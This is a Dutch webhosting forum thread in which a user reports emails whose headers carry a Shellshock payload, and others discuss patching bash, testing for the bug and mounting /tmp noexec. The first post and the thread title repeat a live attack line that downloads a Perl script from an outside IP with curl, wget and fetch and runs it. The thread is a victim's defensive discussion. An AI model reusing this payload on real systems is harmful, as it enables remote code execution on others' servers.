Resultaten 1 tot 13 van de 13
  1. #1
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    timmy
    484 Berichten
    Ingeschreven
    15/08/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter

    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...

    Ik heb een paar emails ontvangen met: from, subject, to, cc, messageId, etc met daarin :

    To:
    () { :;;};/bin/sh.-c.'/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
    References:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Cc:
    () { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
    From:
    () { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;
    Subject:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Date:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Message-ID:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Comments:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Keywords:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Resent-Date:
    () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
    Resent-From:
    () { :;;};/bin/sh.-c.'cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http://178.254.31.165/ex.txt;wget.17...#39;.&;;;;;;;;

    volgens de mail.log

    Oct 24 19:32:12 pie sm-mta[8940]: s9OHWALZ008940: from=<support@mata.com>, size=2364, class=0, nrcpts=1, msgid=<201410241732.s9OHWALZ008
    940@lokaal.xx>, proto=SMTP, daemon=MTA, relay=u16850951.onlinehome-server.com [74.208.184.251]
    Oct 24 19:32:12 pie sm-mta[8942]: s9OHWALZ008940: to=<root@localhost>, delay=00:00:00, xdelay=00:00:00, mailer=local, pri=32636, dsn=2.0
    .0, stat=Sent


    het is me duidelijk dat er een perl file "ex.txt" getracht download word naar /tmp en deze uit eindelijk weer word verwijderd.
    iemand bekend met dit 'fenomeen'?

    Het betreft een debian wheezy, sendmail systeem



  2. #2
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    geregistreerd gebruiker
    82 Berichten
    Ingeschreven
    19/10/11

    Locatie
    Nunspeet / Oost Nederland

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    8 Berichten zijn liked


    Naam: Tom
    Bedrijf: 4easyhosting.com
    URL: https://4easyhosting.com
    Registrar SIDN: nee
    KvK nummer: 08162809
    Ondernemingsnummer: nvt

    Kwam dit tegen http://blog.cloudflare.com/inside-shellshock/
    Google maar een keer op Shellshock exploit

  3. #3
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    geregistreerd gebruiker
    723 Berichten
    Ingeschreven
    16/09/04

    Locatie
    Alkmaar

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    7 Berichten zijn liked


    Naam: Sjoerd
    Bedrijf: Infra Blocks B.V.
    Functie: Eigenaar
    URL: www.infrablocks.nl
    KvK nummer: 60002964
    View sjoerdkleinmeulekamp's profile on LinkedIn

    Nog belangrijker, is je systeem up to date?

  4. #4
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    timmy
    484 Berichten
    Ingeschreven
    15/08/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    De shellshock bug was al in september bekend. En heb ik direct gepatched.

    opnieuw getest:
    > env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
    Bash Test

    > sudo sudo apt-get update && sudo apt-get install --only-upgrade bash
    bash is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

    Ik refereer nog even aan de statement van de mail.log file, daar staat:
    > .... mailer=local, pri=32636, dsn=2.0.0, stat=Sent

    M.a.w. als ik de lul ben zijn jullie het ook !

  5. #5
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    Bizway.nl
    1.426 Berichten
    Ingeschreven
    18/01/10

    Locatie
    Bodegraven

    Post Thanks / Like
    Mentioned
    13 Post(s)
    Tagged
    0 Thread(s)
    92 Berichten zijn liked


    Naam: Bart Lageweg
    Bedrijf: Bizway BV
    Registrar SIDN: ja
    ISPConnect: Lid
    KvK nummer: 28086287
    View nl.linkedin.com/in/bartlageweg's profile on LinkedIn

    Tmp is beveiligd ?


    Sent from my iPhone using webhostingtalk mobile app
    Op zoek naar hostingpartijen die zich willen laten overnemen (met desgewenst aanblijven)

  6. #6
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    geregistreerd gebruiker
    282 Berichten
    Ingeschreven
    23/07/13

    Post Thanks / Like
    Mentioned
    11 Post(s)
    Tagged
    0 Thread(s)
    38 Berichten zijn liked


    Naam: -

    Citaat Oorspronkelijk geplaatst door timmy Bekijk Berichten
    De shellshock bug was al in september bekend. En heb ik direct gepatched.

    opnieuw getest:
    > env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
    Bash Test

    > sudo sudo apt-get update && sudo apt-get install --only-upgrade bash
    bash is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

    Ik refereer nog even aan de statement van de mail.log file, daar staat:
    > .... mailer=local, pri=32636, dsn=2.0.0, stat=Sent

    M.a.w. als ik de lul ben zijn jullie het ook !
    Draai je die test als root of als user?

  7. #7
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    PingOps BV
    3.943 Berichten
    Ingeschreven
    09/12/05

    Locatie
    Almere

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    76 Berichten zijn liked


    Naam: Ramon Fincken
    Bedrijf: Managed WordPress Hosting / PingOps BV / MijnPress.nl
    Functie: CEO
    URL: www.managedwphosting.nl
    Registrar SIDN: Nee
    KvK nummer: 30262182
    TrustCloud: ramonfincken
    View ramonfincken's profile on LinkedIn

    1x patch of 2x patch?
    ManagedWPHosting.nl WordPress hosting, optimalisatie webbouw debugging MijnPress.nl

  8. #8
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    geregistreerd gebruiker
    282 Berichten
    Ingeschreven
    23/07/13

    Post Thanks / Like
    Mentioned
    11 Post(s)
    Tagged
    0 Thread(s)
    38 Berichten zijn liked


    Naam: -

    Citaat Oorspronkelijk geplaatst door timmy Bekijk Berichten
    De shellshock bug was al in september bekend. En heb ik direct gepatched.

    opnieuw getest:
    > env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
    Bash Test

    > sudo sudo apt-get update && sudo apt-get install --only-upgrade bash
    bash is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

    Ik refereer nog even aan de statement van de mail.log file, daar staat:
    > .... mailer=local, pri=32636, dsn=2.0.0, stat=Sent

    M.a.w. als ik de lul ben zijn jullie het ook !
    maar wacht even, je stuurt:
    env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

    vervolgens is het antwoord: Bash Test

    Als je vulnerable was geweest dan had je als antwoord gekregen:
    Bash is vulnerable!

    Dus je bent gewoon safe :?

  9. #9
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    timmy
    484 Berichten
    Ingeschreven
    15/08/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Citaat Oorspronkelijk geplaatst door Bart L Bekijk Berichten
    Tmp is beveiligd ?


    Sent from my iPhone using webhostingtalk mobile app
    hoe bedoel je? Gewoon de standaard dir. rechten.

    - - - Updated - - -

    Citaat Oorspronkelijk geplaatst door Boskoop Bekijk Berichten
    Draai je die test als root of als user?
    als user

  10. #10
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    timmy
    484 Berichten
    Ingeschreven
    15/08/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Citaat Oorspronkelijk geplaatst door Boskoop Bekijk Berichten
    maar wacht even, je stuurt:
    env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

    vervolgens is het antwoord: Bash Test

    Als je vulnerable was geweest dan had je als antwoord gekregen:
    Bash is vulnerable!

    Dus je bent gewoon safe :?

    je snapt het niet.
    Dit gaat via de email. Dus dat zou er op kunnen wijzen dat als je een dergelijk email ontvangt
    je systeem dus gehacked is.

    In mijn geval niet zo probleem. Het systeem betreft een raspberry-pi en die staat in binnen hand bereik.
    Tevens dient ie 'slechts' als persoonlijke email server.

    Er draait geen apache, mysql e.d. op. (Het Staat er wel op maar is disabled).
    Ik denk dat voor de middelde gebruiker op dit fora het probleem vele malen groter is/kan worden.

  11. #11
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    timmy
    484 Berichten
    Ingeschreven
    15/08/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Citaat Oorspronkelijk geplaatst door Ramon Fincken Bekijk Berichten
    1x patch of 2x patch?
    Weet ik niet meer. Ik heb ook m'n mac en nog een server gepatched.

  12. #12
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    moderator
    5.906 Berichten
    Ingeschreven
    21/05/03

    Locatie
    NPT - BELGIUM

    Post Thanks / Like
    Mentioned
    38 Post(s)
    Tagged
    0 Thread(s)
    481 Berichten zijn liked


    Naam: Dennis de Houx
    Bedrijf: All In One
    Functie: Zaakvoerder
    URL: www.all-in-one.be
    Ondernemingsnummer: 0867670047

    Citaat Oorspronkelijk geplaatst door timmy Bekijk Berichten
    hoe bedoel je? Gewoon de standaard dir. rechten.
    Nee, eerder als noexec, nosuid, dan kan zo een exploit wel gedownload worden maar niet gestart worden.
    Dennis de Houx - All In One ~ Official ISPsystem partner

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  13. #13
    email ontvangen met () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt...
    Professional
    2.947 Berichten
    Ingeschreven
    05/02/05

    Locatie
    Alkmaar

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    101 Berichten zijn liked


    Naam: Thomas
    Registrar SIDN: JA
    ISPConnect: Lid
    KvK nummer: 37124732

    Waarom is de conclusie meteen dat het systeem is gehacked?

    Ze doen een poging, maar zolang jij geen rare processen ziet draaien is er volgens mij nog niets aan de hand. Of mis ik iets? En /tmp mounten als noexec gaat niet echt helpen als het commando om te starten perl ex.txt is. Het perl commando wordt gewoon gestart hoor.

Labels voor dit Bericht

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2018 Webhostingtalk.nl.
Web Statistics